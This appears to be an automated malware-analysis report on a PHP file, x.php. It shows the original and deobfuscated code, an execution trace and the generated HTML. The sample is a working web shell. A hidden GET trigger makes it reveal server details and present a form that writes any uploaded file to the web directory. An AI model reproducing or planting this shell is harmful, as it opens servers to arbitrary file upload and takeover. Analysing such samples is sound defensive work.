PHP Malware Analysis

Wff2ZXKr, x.php

md5: 14aa2addb58254d7af071b8703312364

Jump to:

Screenshot


Attributes

Environment

Files

Input


Deobfuscated PHP code

<?php

if (isset($_GET["klash"])) {
    echo "<font color=#000000>[uname]" . php_uname() . "[/uname]";
    echo "<br>";
    print "\n";
    if (@ini_get("disable_functions")) {
        echo "DisablePHP=" . @ini_get("disable_functions");
    } else {
        echo "Disable PHP = NONE";
    }
    echo "<br>";
    print "\n";
    if (@ini_get("safe_mode")) {
        echo "Safe Mode = ON";
    } else {
        echo "Safe Mode = OFF";
    }
    echo "<br>";
    print "\n";
    echo "<form method=post enctype=multipart/form-data>";
    echo "<input type=file name=f><input name=v type=submit id=v value=up><br>";
    if ($_POST["v"] == up) {
        if (@copy($_FILES["f"]["tmp_name"], $_FILES["f"]["name"])) {
            echo "<b>Uploade Done</b>-->" . $_FILES["f"]["name"];
        } else {
            echo "<b>gagal";
        }
    }
}
echo "<!-- s7_C3ek= -->";
echo "<br>";

Execution traces

data/traces/14aa2addb58254d7af071b8703312364_trace-1676261553.235.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:12:59.132841]
1	0	1	0.000174	393464
1	3	0	0.000252	399960	{main}	1		/var/www/html/uploads/x.php	0	0
1	3	1	0.000270	399960
			0.000296	314200
TRACE END   [2023-02-13 02:12:59.132995]


Generated HTML code

<html><head></head><body><br></body></html>

Original PHP code

<?php if(isset($_GET["klash"])){echo"<font color=#000000>[uname]".php_uname()."[/uname]";echo "<br>";print "\n";if(@ini_get("disable_functions")){echo "DisablePHP=".@ini_get("disable_functions");}else{ echo "Disable PHP = NONE";}echo "<br>";print "\n";if(@ini_get("safe_mode")){echo "Safe Mode = ON";}else{ echo "Safe Mode = OFF";} echo "<br>";print "\n";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>Uploade Done</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}}?><?php echo "<!-- s7_C3ek= -->";echo "<br>";?>